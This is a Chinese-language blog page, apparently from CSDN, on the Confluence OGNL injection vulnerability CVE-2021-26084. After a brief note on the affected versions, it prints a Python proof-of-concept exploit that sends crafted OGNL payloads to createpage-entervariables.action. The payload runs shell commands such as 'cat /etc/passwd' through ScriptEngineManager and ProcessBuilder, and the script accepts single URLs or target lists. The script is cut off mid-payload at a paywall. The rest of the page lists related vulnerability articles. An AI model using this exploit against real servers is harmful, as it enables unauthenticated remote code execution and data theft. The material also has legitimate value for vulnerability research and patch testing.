CVE-2021-26084

最新推荐文章于 2024-06-09 09:32:23 发布
最新推荐文章于 2024-06-09 09:32:23 发布
阅读量2.2k 收藏
点赞数
分类专栏: 漏洞 研究 文章标签: python java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/120443133
版权

在 Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。

#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File    :   PoC.py
"""


import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()


def usage():
    print("Eg: \n    python3 PoC.py -u http://127.0.0.1")
    print("    python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
    print("    python3 PoC.py -f urls.txt")


def poc(host):
    url = host + "/pages/createpage-entervariables.action?SpaceKey=x"
    headers = {
   
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}
    params = {
   "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ip a\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022,
最低0.47元/天 解锁文章
GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2182
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Confluence CVE-2021-26084远程代码执行漏洞复现
热门推荐
Websec
09-08 1万+
一、漏洞概述 近日,Atlassian官方发布了ConfluenceServerWebworkOGNL注入漏洞(CVE-2021-26084)的安全公告,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码,CVSS评分为9.8。请相关用户尽快采取措施进行防护。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,...
探秘CVE-2021-26084:深入解析Confluence Server的OGNL注入漏洞防御工具
最新发布
gitblog_00092的博客
06-09 306
探秘CVE-2021-26084:深入解析Confluence Server的OGNL注入漏洞防御工具 项目地址:https://gitcode.com/hev0x/CVE-2021-26084_Confluence 在网络安全的前沿阵地,每一款强大的防御工具的诞生都是对潜在威胁的一次有力反击。今天,我们将聚焦于一款针对Confluence Server的开源安全研究工具——专门应对CVE-202...
CVE-2021-26084(confluence)
sinat_42420072的博客
01-26 1352
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
weixin_56306210的博客
06-21 1619
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
CVE-2021-26084 goby exp
不光要学,知识要能说出口
10-29 389
CVE-2021-26084 goby exp声明代码 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Confluence RCE(CVE-2021-26084)", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "product=\"Confluence\"",
CVE-2021-26084(confluence)(2),2024网络安全岗面试题知识点小结
m0_60666841的博客
04-05 860
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-26084 漏洞分析
why811的博客
10-17 218
userdirective:自定义函数路径。
Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现
m0_64366018的博客
01-16 564
和Confluence Data Center上存在一个注入漏洞,漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。
Atlassian Confluence OGNL表达式注入RCE CVE-2021-26084
why811的博客
10-17 818
参考:https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md。返回包出现999即可证明ognl表达式成功执行。
Atlassian Confluence OGNL表达式注入代码执行漏洞(CVE-2021-26084
wangqiao258的博客
10-13 2946
环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个环境中的安装方法,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres。 漏洞复现: POST /pages/createpage-entervariables.action HTTP/1.1 Host: 192.168
CVE-2021-21984:VMware vRealize Business for Cloud 远程代码执行漏洞通告
爱国小白帽
05-07 534
报告编号:B6-2021-050602 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-06 0x01 漏洞简述 2021年05月06日,360CERT监测发现VMware发布了vRealize Business for Cloud的风险通告,官方漏洞编号为VMSA-2021-0007,CVE漏洞编号为CVE-2021-21984,漏洞等级:严重,漏洞评分:9.8。 vRealize Business for Cloud是一种自动化的云业务管理解决方案,旨在为IT团队提供云.
通报:Confluence远程代码执行漏洞(CVE-2021-26084)被黑产大规模利用
qcloud_security的博客
09-06 1791
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。 腾讯安全旗下全系列企业级产品均已支持检测防御利用Atlassian Confluence远程代码执行漏洞的攻击活动。 腾讯云上安全产品全栈提供针对Confluence远程代码执行漏洞的检测防护能力,政企用户运维人员.
Atlassian Confluence 远程代码执行漏洞复现(CVE-2021-26084
0xSec
01-17 1352
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
CVE-2021-26084 tomcat漏洞修复
05-11
CVE-2021-26084是Tomcat的一个严重漏洞,攻击者可以利用此漏洞在未经授权的情况下执行任意代码或进行任意文件读取。建议尽快修复此漏洞以保护您的系统。 以下是修复此漏洞的步骤: 1. 升级Tomcat到最新版本。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值